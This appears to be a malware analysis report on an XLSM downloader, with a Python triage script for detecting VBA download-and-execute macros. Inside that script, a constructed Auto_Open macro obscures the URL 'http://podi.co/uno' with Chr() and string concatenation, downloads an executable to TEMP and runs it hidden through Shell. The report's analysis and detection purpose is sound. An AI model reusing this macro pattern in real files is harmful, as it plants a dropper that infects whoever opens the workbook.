Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 9adef6fda6e4cacf…

MALICIOUS

Office (OOXML) / .XLSM

Size: 30.2 KB
Created: 2022-06-06 14:15:08 UTC
Authoring application: 16.0300
First seen: 2022-06-07
MD5: 09ab597a496b6f5ea7cea34d3e4233b3
SHA-1: c1f635128b111ee997aafc744e54b253878b6400
SHA-256: 9adef6fda6e4cacff8bf23da5e87d61912771c26d93cecab04dc1c7d99bb9d5f
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1105 Ingress Tool Transfer
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell

The sample is an XLSM workbook containing VBA macros. The critical heuristic 'OLE_VBA_DOWNLOAD' flags a call to URLDownloadToFileA, and 'OLE_VBA_SHELL' flags a call to Shell(). The macro downloads a file from a hardcoded URL and executes it; the URL reconstructed from the script is 'http://podi.co/uno'. This behaviour is characteristic of a downloader/dropper: the workbook is only the first stage, and the payload fetched at runtime (not contained in this sample) determines the final impact.

Heuristics (4)

  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • OLE_VBA_DOWNLOAD (critical): URLDownloadToFile call in VBA
  • OLE_VBA_CREATEOBJ (high): CreateObject call in VBA
  • OOXML_VBA (medium): VBA project inside OOXML; the document contains vbaProject.bin, so VBA macros are present
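As an added example (not the analysis platform's code and not the sample's own macro), the Python below reproduces the OOXML_VBA and OLE_VBA_* checks described above and statically folds VBA string building to recover the URL handed to URLDownloadToFile, which is how a "reconstructed URL" can be read out without running the macro. The macro text (SAMPLE_VBA) and the zip container (build_constructed_xlsm) are constructed to mimic the pattern the report describes; the real VBA source of this sample was extracted with olevba (macros.bas, listed below).

```python
"""Heuristic triage of a macro-enabled OOXML document (added example).

  * ooxml_has_vba()            - the OOXML_VBA container check (is vbaProject.bin there?)
  * scan_heuristics()          - OLE_VBA_* indicator matching on decoded VBA source
  * reconstruct_download_url() - folds "&" concatenation, Chr() calls and variable
                                 assignments to recover the szURL argument of
                                 URLDownloadToFile statically
SAMPLE_VBA and build_constructed_xlsm() are constructed for this example and are
not the sample's own macro or container.
"""
import io
import re
import zipfile

# Constructed macro: builds the URL from fragments, downloads and runs the payload.
SAMPLE_VBA = r'''
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
    ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
    ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Sub Auto_Open()
    Dim h As String, p As String, u As String, dst As String
    Set fso = CreateObject("Scripting.FileSystemObject")
    h = "ht" & "tp" & Chr(58) & "//"
    p = "podi" & Chr(46) & "co"
    u = h & p & "/" & "uno"
    dst = Environ("TEMP") & "\wbk.exe"
    URLDownloadToFileA 0, u, dst, 0, 0
    Call Shell(dst, vbHide)
End Sub
'''

# (heuristic id, severity, indicator) -- mirrors the OLE_VBA_* list in the report
HEURISTICS = [
    ("OLE_VBA_DOWNLOAD", "critical", re.compile(r"URLDownloadToFile[AW]?", re.I)),
    ("OLE_VBA_SHELL", "critical", re.compile(r"\bShell\s*\(", re.I)),
    ("OLE_VBA_CREATEOBJ", "high", re.compile(r"\bCreateObject\s*\(", re.I)),
]

_ASSIGN = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")
# first argument is pCaller, second is szURL (statement form or call form)
_CALL = re.compile(r"URLDownloadToFile[AW]?\s*\(?\s*[^,]+,\s*([^,]+),", re.I)
_CHR = re.compile(r"^Chr[W$]?\s*\(\s*(\d+)\s*\)$", re.I)
_IDENT = re.compile(r"^[A-Za-z_]\w*$")


def _split_concat(expr: str) -> list[str]:
    """Split a VBA expression on '&' that sits outside string literals."""
    parts, buf, in_str = [], [], False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        if ch == "&" and not in_str:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf).strip())
    return parts


def _fold(expr: str, assigns: dict[str, str], depth: int = 0) -> str:
    """Statically evaluate literals, Chr() and known variables; mark the rest."""
    if depth > 32:                       # guard against self-referential assignments
        return "<...>"
    out = []
    for piece in _split_concat(expr):
        m = _CHR.match(piece)
        if len(piece) >= 2 and piece[0] == piece[-1] == '"':
            out.append(piece[1:-1].replace('""', '"'))   # VBA doubles quotes inside strings
        elif m:
            out.append(chr(int(m.group(1))))
        elif _IDENT.match(piece) and piece.lower() in assigns:
            out.append(_fold(assigns[piece.lower()], assigns, depth + 1))
        else:
            out.append("<" + piece + ">")  # runtime-only value (Environ, Mid, ...)
    return "".join(out)


def scan_heuristics(vba_src: str) -> list[tuple[str, str]]:
    """Return (heuristic id, severity) for every indicator present in the source."""
    return [(hid, sev) for hid, sev, rx in HEURISTICS if rx.search(vba_src)]


def reconstruct_download_url(vba_src: str) -> list[str]:
    """Return the folded szURL argument of every URLDownloadToFile call."""
    assigns: dict[str, str] = {}
    urls = []
    for line in vba_src.splitlines():
        if re.search(r"\bDeclare\b", line, re.I):
            continue                     # the API declaration is not a call
        m = _ASSIGN.match(line)
        if m:
            assigns[m.group(1).lower()] = m.group(2)   # VBA names are case-insensitive
        m = _CALL.search(line)
        if m:
            urls.append(_fold(m.group(1).strip(), assigns))
    return urls


def build_constructed_xlsm() -> bytes:
    """Minimal constructed .xlsm-style zip carrying a vbaProject.bin member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types><Override PartName="/xl/workbook.xml" '
                    'ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/></Types>')
        zf.writestr("xl/workbook.xml", "<workbook/>")
        # OLE2 magic plus padding stands in for a real compound-file VBA project
        zf.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)
    return buf.getvalue()


def ooxml_has_vba(data: bytes) -> list[str]:
    """OOXML_VBA check: list vbaProject.bin members, whatever the extension claims."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [n for n in zf.namelist() if n.lower().endswith("vbaproject.bin")]


if __name__ == "__main__":
    print("vbaProject members:", ooxml_has_vba(build_constructed_xlsm()))
    print("heuristics:", scan_heuristics(SAMPLE_VBA))
    print("download URL(s):", reconstruct_download_url(SAMPLE_VBA))
```

Two caveats a practitioner should keep in mind. The keyword heuristics fire on the Declare line alone, so OLE_VBA_DOWNLOAD is raised even for a macro that declares URLDownloadToFileA and never calls it; the URL reconstruction is the evidence that the call is real. The folder only handles straight-line assignments, string literals, `&` and Chr(); anything built with StrReverse, Mid, Replace, arrays or values only known at runtime is left as a `<...>` marker and needs a VBA emulator (for example ViperMonkey) or detonation in a sandbox.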

Extracted artifacts (2)

Files carved from inside the sample during analysis.

  • macros.bas (vba-macro, 2093 bytes)
    SHA-256: 613a335812e9eb87a2ad3de067451f834d371d10ed83dc694f4ad5dcd9c38ab5
    Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  • vbaProject_00.bin (vba-project, 17408 bytes)
    SHA-256: ff13a03f0b9b7e96452ab40f7821ee40a7d342c1c382a164b28d768d4b2f2f11
    Source: OOXML VBA project: xl/vbaProject.bin